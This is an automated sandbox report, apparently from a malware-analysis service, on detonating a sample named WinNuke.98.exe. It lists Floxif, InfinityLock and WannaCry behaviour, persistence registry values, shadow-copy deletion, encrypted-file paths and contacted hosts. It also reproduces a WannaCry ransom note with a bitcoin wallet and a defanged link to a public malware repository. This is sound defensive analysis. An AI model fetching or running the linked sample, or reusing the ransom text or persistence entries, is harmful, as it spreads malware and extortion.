floxif | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/blob/master/Virus/WinNuke[.]98[.]exe

Analysis

max time kernel
416s
max time network
418s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
03-08-2024 18:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Virus/WinNuke.98.exe

Score

10^/10

floxif infinitylock wannacry backdoor defense_evasion discovery execution impact persistence ransomware trojan upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Floxif, Floodfix
Floxif aka FloodFix is a file-changing trojan and backdoor written in C++.
backdoor trojan floxif
InfinityLock Ransomware
Also known as InfinityCrypt. Based on the open-source HiddenTear ransomware.
ransomware infinitylock
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Detects Floxif payload 1 IoCs

backdoor

Processes:

resource	yara_rule
C:\Program Files\Common Files\System\symsrv.dll	floxif

Downloads MZ/PE file

Drops file in Drivers directory 4 IoCs

Processes:

Gnil.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\drivers\spoclsv.exe	Gnil.exe
File created	C:\Windows\SysWOW64\drivers\spoclsv.exe	Gnil.exe
File created	C:\Windows\SysWOW64\drivers\spoclsv.exe:SmartScreen:$DATA	Gnil.exe
File created	C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA	Gnil.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Program Files\Common Files\System\symsrv.dll	acprotect

Drops startup file 2 IoCs

Processes:

[email protected]

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD35BC.tmp	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD35C3.tmp	[email protected]

Executes dropped EXE 38 IoCs

Processes:

WinNuke.98.exeFloxif.exeFloxif.exeFloxif.exeSetup.exeGnil.exespoclsv.exensd9C7.tmpPcAppStore.exeWatchdog.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exetaskdl.exeNW_store.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exe@[email protected]taskse.exetaskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	process
3128	WinNuke.98.exe
4832	Floxif.exe
1860	Floxif.exe
2212	Floxif.exe
4048	Setup.exe
880	Gnil.exe
4780	spoclsv.exe
1636	nsd9C7.tmp
4796	PcAppStore.exe
2192	Watchdog.exe
2928	NW_store.exe
5088	NW_store.exe
2892	NW_store.exe
1248	NW_store.exe
3020	NW_store.exe
5132	NW_store.exe
5656	NW_store.exe
5152	NW_store.exe
6328	NW_store.exe
6364	NW_store.exe
6456	NW_store.exe
5700	taskdl.exe
6708	NW_store.exe
2340	@[email protected]
5064	@[email protected]
7132	taskhsvc.exe
3892	taskdl.exe
5776	@[email protected]
3128	taskse.exe
5812	taskdl.exe
3444	taskse.exe
4784	@[email protected]
1540	taskse.exe
2684	@[email protected]
5684	taskdl.exe
5972	taskse.exe
4428	@[email protected]
6632	taskdl.exe

Loads dropped DLL 64 IoCs

Processes:

Floxif.exeFloxif.exeFloxif.exeSetup.exensd9C7.tmpNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exetaskhsvc.exe

pid	process
4832	Floxif.exe
1860	Floxif.exe
2212	Floxif.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
5088	NW_store.exe
2892	NW_store.exe
1248	NW_store.exe
3020	NW_store.exe
1248	NW_store.exe
1248	NW_store.exe
3020	NW_store.exe
3020	NW_store.exe
5132	NW_store.exe
5132	NW_store.exe
5132	NW_store.exe
1248	NW_store.exe
1248	NW_store.exe
1248	NW_store.exe
1248	NW_store.exe
5656	NW_store.exe
5656	NW_store.exe
5656	NW_store.exe
5656	NW_store.exe
5152	NW_store.exe
5152	NW_store.exe
5152	NW_store.exe
6328	NW_store.exe
6328	NW_store.exe
6328	NW_store.exe
6364	NW_store.exe
6456	NW_store.exe
6456	NW_store.exe
6456	NW_store.exe
6364	NW_store.exe
6364	NW_store.exe
6708	NW_store.exe
6708	NW_store.exe
6708	NW_store.exe
6708	NW_store.exe
7132	taskhsvc.exe
7132	taskhsvc.exe
7132	taskhsvc.exe
7132	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5492 icacls.exe

pid	process
5492	icacls.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Program Files\Common Files\System\symsrv.dll	upx
behavioral1/memory/4832-283-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/4832-287-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/1860-306-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/1860-309-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2212-326-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2212-329-0x0000000010000000-0x0000000010030000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

nsd9C7.tmpreg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Software\Microsoft\Windows\CurrentVersion\Run\PCAppStore = "\"C:\\Users\\Admin\\PCAppStore\\PCAppStore.exe\" /init default"	nsd9C7.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Software\Microsoft\Windows\CurrentVersion\Run\PcAppStoreUpdater = "\"C:\\Users\\Admin\\PCAppStore\\AutoUpdater.exe\" /i"	nsd9C7.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Software\Microsoft\Windows\CurrentVersion\Run\Watchdog = "\"C:\\Users\\Admin\\PCAppStore\\Watchdog.exe\" /guid=C9038F8C-1E1B-4144-A72A-756D47BBFF27X /rid=20240803183635.693240807937 /ver=fa.1091q"	nsd9C7.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mnmgcwodykunqun973 = "\"C:\\Users\\Admin\\Downloads\\WannaCrypt0r (1)\\tasksche.exe\""	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

PcAppStore.exe

description ioc process

File opened (read-only) \??\F: PcAppStore.exe
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

133 yandex.com
134 yandex.com
7 raw.githubusercontent.com
31 raw.githubusercontent.com
71 yandex.com
132 yandex.com

description	ioc	process
File opened (read-only)	\??\F:	PcAppStore.exe

flow	ioc
133	yandex.com
134	yandex.com
7	raw.githubusercontent.com
31	raw.githubusercontent.com
71	yandex.com
132	yandex.com

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

NW_store.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	NW_store.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	NW_store.exe

Drops file in System32 directory 2 IoCs

Processes:

NW_store.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	NW_store.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	NW_store.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

[email protected]@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Program Files directory 64 IoCs

Processes:

[email protected][email protected]

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\iw_get.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\VisualElements\SmallLogoCanary.png.DATA.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\caution.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\VisualElements\SmallLogoDev.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-hover_32.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Locales\fil.pak.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\share.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\psuser_64.dll.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\onnxruntime.dll.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up-pressed.gif.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdate.exe.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\identity_proxy\stable.identity_helper.exe.manifest.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\eu.pak.DATA.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AXE8SharedExpat.dll.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-default.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview-hover.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\export.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\learning_tools.dll.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Roundrect_White@1x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\AdobeHunspellPlugin.dll.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\mojo_core.dll.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\identity_helper.exe.manifest.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Locales\sq.pak.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\msedgeupdateres_et.dll.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\README_th_en_CA_v2.txt.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforcomments_18.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\MLModels\autofill_labeling_features.txt.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons_retina.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr-2x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected-hover.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521	[email protected]

Drops file in Windows directory 1 IoCs

Processes:

NW_store.exe

description ioc process

File opened for modification C:\Windows\SystemTemp NW_store.exe

description	ioc	process
File opened for modification	C:\Windows\SystemTemp	NW_store.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 4 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

Processes:

msedge.exemsedge.exemsedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Setup.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Gnil.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
956	4832	WerFault.exe	Floxif.exe
1932	1860	WerFault.exe	Floxif.exe
2572	2212	WerFault.exe	Floxif.exe
2696	5064	WerFault.exe	@[email protected]
5524	5064	WerFault.exe	@[email protected]

System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

@[email protected]taskdl.exetaskse.exeSetup.exetaskhsvc.exeWMIC.exetaskse.exe[email protected]nsd9C7.tmpattrib.exetaskdl.execmd.exetaskse.exe@[email protected]taskse.exe@[email protected]icacls.execmd.exetaskdl.exeFloxif.exe@[email protected]PcAppStore.exeGnil.execscript.execmd.exe@[email protected][email protected]@[email protected]taskdl.exeWinNuke.98.exe[email protected]cmd.exeattrib.exeFloxif.exereg.exetaskdl.exeFloxif.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nsd9C7.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Floxif.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
